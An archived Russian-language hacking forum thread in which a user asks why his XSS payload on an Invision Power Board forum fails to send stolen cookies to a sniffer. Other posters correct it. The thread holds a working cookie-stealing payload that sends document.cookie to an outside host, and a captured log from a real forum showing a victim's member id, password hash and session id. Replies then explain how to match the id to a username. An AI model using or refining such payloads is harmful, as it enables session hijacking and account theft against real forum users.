PDA

Просмотр полной версии : Вопрос про проведении атаки класса XSS, в форуме Invison Power Board

Demon
21.06.2005, 01:28
Здравствуйте! Объясните ламеру что не так: прочитал статью про взлом Invision(4 часть)
создал топик с таким скриптом:
http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
он преобразовался в:
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
и никакие логи сниффера мне не приходят. Подскажите пожалуйста что я не так делаю.
Спасибо
Rebz
21.06.2005, 04:08
Эту багу уже пофиксили давно))

"никакие логи сниффера мне не приходят" - они к тебе и не должны приходить. Логи на всеобщем обозрении лежат)).
Rufas
21.06.2005, 05:13
Здравствуйте! Объясните ламеру что не так: прочитал статью про взлом Invision(4 часть)
создал топик с таким скриптом:
http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
он преобразовался в:
'>` style=background:url(javascript:document.images[68].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
и никакие логи сниффера мне не приходят. Подскажите пожалуйста что я не так делаю.
Спасибо

http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
Demon
21.06.2005, 14:37
"никакие логи сниффера мне не приходят" - они к тебе и не должны приходить. Логи на всеобщем обозрении лежат)).
а если я подписался на рассылку логов то они же должны были прийти ко мне на мыло. И вот пришел один лог:
REFERER: http://sapr2000.ru/invision/index.php?showtopic=926&hl=
QUERY: b=b; invisionmember_id=628; invisionpass_hash=c163a733c3d40d524762af18b5562c75 ; invisionqr_type=0;
invisionforum_read=a:4:{i:0;i:1119275520;i:25;i:11 13983630;i:7;i:1117605897;i:49;i:1118139355;}; invisionanonlogin=-1;
invisionsession_id=60369d110e78a006a2da1854d403199 b; invisionmodtids=,;
invisiontopicsread=a:2:{i:6596;i:1119330745;i:6634 ;i:1119330773;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
как я понял id юзера 628, а его хеш - c163a733c3d40d524762af18b5562c75
но как мне узнать какой ник соответствует этому номеру?
Rebz
21.06.2005, 16:47
Ах да..)) сорри, действительно, совсем забыл что можно подписаться)

Посомтри а Members или в урле бразуера... какой id соответствует юзеру.